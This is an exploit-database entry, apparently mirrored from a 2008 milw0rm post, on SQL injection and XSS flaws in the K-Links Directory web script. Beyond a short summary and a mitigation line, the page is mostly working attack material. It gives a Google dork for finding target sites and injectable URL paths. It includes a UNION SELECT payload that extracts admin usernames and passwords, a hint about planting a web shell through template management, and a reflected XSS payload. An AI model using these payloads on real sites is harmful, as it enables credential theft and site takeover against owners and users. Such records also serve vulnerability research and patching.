header-logo
Suggest Exploit
vendor:
K-Links Directory
by:
Corwin
7.5
CVSS
HIGH
SQL-INJECTION, XSS
89, 79
CWE
Product Name: K-Links Directory
Affected Version From: All
Affected Version To: All
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

K-Links Directory SQL-INJECTION, XSS

K-Links Directory is vulnerable to SQL-INJECTION and XSS. An attacker can exploit the vulnerability by sending a malicious SQL query to the vulnerable parameter in the report, visit, addreview and refer page. An attacker can also exploit the XSS vulnerability by sending a malicious script to the login_message parameter in the index page.

Mitigation:

Input validation should be done to prevent SQL-INJECTION and XSS attacks. The application should also be tested for any other security vulnerabilities.
Source

Exploit-DB raw data:

================================================================================
|| K-Links Directory SQL-INJECTION, XSS                          
================================================================================

Application: K-Links Directory
------------

Website: http://turn-k.net/k-links
--------

Version: Platinum (All)
--------

About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.
------

Googledork: Powered By K-Links Directory
-----------

Demo: http://klinksdemo.com
-----

[ SQL-INJECTION ]

http://host/report/-1[SQL]
http://host/visit.php?id=-1[SQL]
http://host/addreview/-1[SQL]
http://host/refer/-1[SQL]

===>>> Exploit:

http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/*


/* Admin Login -  http://host/admin 

Manage Templates => web-shell */


[ PASSIVE XSS  :)  ]

http://host/index.php?req=login&redirect=&login_message=<script>alert()</script>


Author: Corwin
-------                                     
	
Contact: corwin88[dog]mail[dot]ru
--------

# milw0rm.com [2008-08-02]

Navigation

Suggest Exploit

Services By CQR